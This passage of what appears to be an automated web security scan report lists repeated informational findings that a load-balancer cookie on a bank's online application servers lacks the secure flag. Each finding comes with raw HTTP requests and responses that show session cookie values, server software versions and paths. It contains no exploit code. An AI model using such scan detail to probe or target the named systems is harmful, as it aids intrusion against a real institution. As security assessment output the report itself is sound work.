Host:   https://secureapps.regions.com
Path:   /oao/Images/helpIcon.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/helpIcon.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 326
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a......l."w.3.....w`..Y..]....K.....u[.    .....Q..N..................W..}.<........{a................`..f.?..T...............k.!..x..._........U...................................................
...[SNIP]...
5.35. https://secureapps.regions.com/oao/Images/loading7.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/loading7.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/loading7.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2246
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89aQ....?...............w.....H..h..r........X........*....................5..+.....i..X..;..K..............s..l.....<..L.................).....Y........f.....@.....8..H.....y...........I........W.
...[SNIP]...
5.36. https://secureapps.regions.com/oao/Images/yourinformation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/yourinformation.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/yourinformation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 4021
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:06 GMT

GIF89a............................sss...VVV.......l".....DDDD..f....w3........U.`......w..........U.fff......!.......,............'.di.h..l..p,..c......}..m0.>......9......&.;./($...QGx...hs..    ....oT.
...[SNIP]...
5.37. https://secureapps.regions.com/oao/Scripts/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Scripts/jquery.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Scripts/jquery.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 29856
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/*
* jQuery 1.2.3 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 20
...[SNIP]...
5.38. https://secureapps.regions.com/oao/Scripts/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Scripts/thickbox.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Scripts/thickbox.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 17069
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/*
* Thickbox 3.1 - One Box To Rule Them All.
* By Cody Lindley (http://www.codylindley.com)
* Copyright (c) 2007 cody lindley
* Licensed under the MIT License: http://www.opensource.org/licen
...[SNIP]...
5.39. https://secureapps.regions.com/oao/app01.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app01.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/app01.aspx?type=prefplus HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Date: Mon, 16 May 2011 15:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; domain=secureapps.regions.com; path=/; secure; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 48498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
5.40. https://secureapps.regions.com/oao/app02.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app02.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/app02.aspx?type=savings HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=savings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 76388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
5.41. https://secureapps.regions.com/oao/images/arrowOrange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/arrowOrange.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/arrowOrange.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 60
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a..    .....f..........!.......,......    ........-..49v.).;
5.42. https://secureapps.regions.com/oao/images/bgDot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/bgDot.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/bgDot.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 46
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a.............!.......,.................;
5.43. https://secureapps.regions.com/oao/images/continue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/continue.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/continue.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555542668:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 407
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:23 GMT

GIF89aG...............]..`....V.....wl."..f.....D......w.3......[.    d....i..T.....A..N.....rq.*.........U.....!.......,....G........e.g.h..l....}...x...7..`.....-.+a.t.. a2...".........=B..o..p>L    ....
...[SNIP]...
5.44. https://secureapps.regions.com/oao/images/ehl_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/ehl_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/ehl_logo.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 595
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a.........[[[...\\\MMM......ttt......```hhhmmm]]]...WWW___......KKK|||......jjj...{{{~~~.........VVV...............XXXlllRRR...xxxQQQ............yyy..................vvvbbb......iii.............
...[SNIP]...
5.45. https://secureapps.regions.com/oao/images/error.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/error.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/error.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 299
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:23 GMT

GIF89a..........,........}y....`[....E<....... ..............ro.SM.......'..................................!.......,.......... ...40U:)."8.. .UgVve:$~.
...d8.N`.Q...%..h0....    ...O...\...........s%
...[SNIP]...
5.46. https://secureapps.regions.com/oao/images/homepage.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/homepage.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/homepage.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/ErrorPage.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555620131:ss=1305555542668; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Content-Length: 632
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:42 GMT

GIF89a.........U`........]....D..w..............f......w.3...[.    d....T........B..N....?.........l."...U.....!.......,...............g.h..l..p,.ht}...|..@........k.Q:.P..u.X;.....&..S..-7W...Q..M..<..
...[SNIP]...
5.47. https://secureapps.regions.com/oao/images/icon_secure.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/icon_secure.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/icon_secure.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 77
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:18 GMT

GIF89a    .............i....!.......,....    .........1-;.....n..#.4b.F"x.........;
5.48. https://secureapps.regions.com/oao/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/loadingAnimation.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/loadingAnimation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555542668:ss=1305555542668; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 5886
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:17 GMT

GIF89a......................................................................................................!..NETSCAPE2.0.....!...
...,.......... .@Ri.h..l..p,.tm..#6N......+.r..rD4...h..@F.Cj.z]L.
...[SNIP]...
5.49. https://secureapps.regions.com/oao/scripts/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/scripts/wtbase.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/scripts/wtbase.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 17051
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:01 GMT

function DcsInit() {
this.dcsid = "dcs4b71fc10000gs8u88h5t1k_6n2i";
this.domain = "statse.webtrendslive.com";
this.enabled = true;
this.exre = (function() {
if (window.Reg
...[SNIP]...
5.50. https://secureapps.regions.com/oao/styles/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/styles/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/styles/main.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 10689
Content-Type: text/css
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:57 GMT


img{border:none; padding:0px; margin:0px;}

body {background: #fff; font-family: Arial; color: #444; font-size: 1em; margin:0; padding: 0;}

A:link {color: #580; text-decoration: none;}
A:activ
...[SNIP]...
5.51. https://secureapps.regions.com/oao/styles/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/styles/thickbox.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/styles/thickbox.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 4016
Content-Type: text/css
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/* ----------------------------------------------------------------------------------------------------------------*/
/* ---------->>> global settings needed for thickbox <<<-------------------------
...[SNIP]...
5.52. https://securebank.regions.com/SystemUnavailable.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /SystemUnavailable.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SystemUnavailable.aspx?ResultCode=VALIDATIONERROR HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: securebank.regions.com-https=R890651000; ASP.NET_SessionId=rxyjhw55ndvthz45fybes045

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 4559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
   <HEAD>
       <title>Regions Online Banking</title>
       <link href="https://secureb
...[SNIP]...
5.53. https://securebank.regions.com/VAM/2_0_2/VAM.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAM.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAM/2_0_2/VAM.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
